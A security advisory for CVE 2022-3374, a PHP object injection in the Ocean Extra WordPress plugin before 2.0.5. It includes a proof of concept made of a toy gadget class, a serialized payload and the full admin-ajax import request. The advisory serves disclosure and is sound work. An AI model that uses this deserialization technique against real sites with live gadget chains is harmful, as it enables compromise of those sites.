Ocean Extra < 2.0.5 – Admin+ PHP Objection Injection | CVE 2022-3374

Description

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named import.dat with the following content: O:4:"Evil":0:{};

Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)

The view the response of the import request made, which will have the "Arbitrary deserialization" message

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]

-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream

O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"

oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"

166c9022e0
-----------------------------371888087213614698033751989022--